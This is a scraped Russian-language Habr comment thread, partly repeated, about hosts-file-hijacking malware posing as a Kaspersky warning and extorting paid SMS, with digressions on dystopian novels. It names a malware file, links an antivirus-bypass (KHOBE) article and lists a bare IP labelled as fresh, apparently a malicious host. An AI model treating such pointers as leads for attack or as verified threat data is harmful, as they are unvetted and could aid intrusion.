Да, вреда-то особого и нет, но… возможно я слишком осторожничаю со своей совестью, полагая, что грань между невинными шутками и серьезными преступлениями вроде финансовых махинаций, промышленного шпионажа и саботажа крайне тонка :)
Да, много раз уже советовали «Мы». Уже вот-вот у меня дойдут руки) Аналогично и про «скотный двор». А вот за Хаксли спасибо).
Кстати, 1984 очень сильно напоминает «451 по Фаренгейту» Бредберри. Пока читал всё время аналогии проводил.
Я сам не шкодил особенно, поэтому, возможно, просто вас не понимаю. Но, скорее всего вы правы.
Это как у электриков — умирают или зелёные, которые не понимаю, или старики, которые всё знают и уверены, что ничего страшного не будет))
Кстати, 1984 очень сильно напоминает «451 по Фаренгейту» Бредберри. Пока читал всё время аналогии проводил.
Я сам не шкодил особенно, поэтому, возможно, просто вас не понимаю. Но, скорее всего вы правы.
Это как у электриков — умирают или зелёные, которые не понимаю, или старики, которые всё знают и уверены, что ничего страшного не будет))
У касперского сайты эти в базе (может по ip, может еще как хитро), поэтому он и не пускал на фишинговые ресурсы. Вопрос в другом как разрешили исправить hosts? Ведь касперский всегда грозно предупреждает при его изменении.
Касперский тут вообще не при чём, его и в системе-то может не было. Внимательно посмотрите на скриншот сообщения: даже не зная их формата у Касперского, можно логически заключить, что серьезный антивирус не может выдавать такую, простите, туфту :)
Вы мне говорите? Тема касперского уже раскрыта выше: http://habrahabr.ru/blogs/virus/93289/?reply_to=2830825#comment_2829629.
Ну то есть, я не считаю, что это правда касперский))
Ну то есть, я не считаю, что это правда касперский))
После писал абузу в ДЦ где находился данный ip, ответа не последовало.
Только вчера лечил сей не дуг, на компе стоял KAV 2010 в парнойном режиме, но очевидно девочка подросток что то не поняла и разрешила, человек эту фигню подхватил в начале майских и пока меня ждал пытался даже отправить смс, было на счету рублей 200 не сняли, видимо хотели больше, после этой попытки ему пришло смс "%personname% ты что офигел, а ну быстро клади деньги на телефон, мы из Дагестана с нами лучше не связываться", человек офигел и с удвоенной силой пытался выцепить меня на праздниках…
И, конечно же, заражение произошло через флеш, который все так хвалят и в котором исправили все уязвимости.
А ещё есть забавная штука svcgoost.exe, которая не оставляет следов в etc/hosts (по-моему она просто удаляет его)
А откуда вы узнали что реально смс стоит не 100 рублей а 250?
скоро Kernel HOok Bypassing Engine заработает на полную мощь — проверим тогда наши анвири
www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php
www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php
113.11.194.160
свеженький
свеженький
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Заботливые вирусы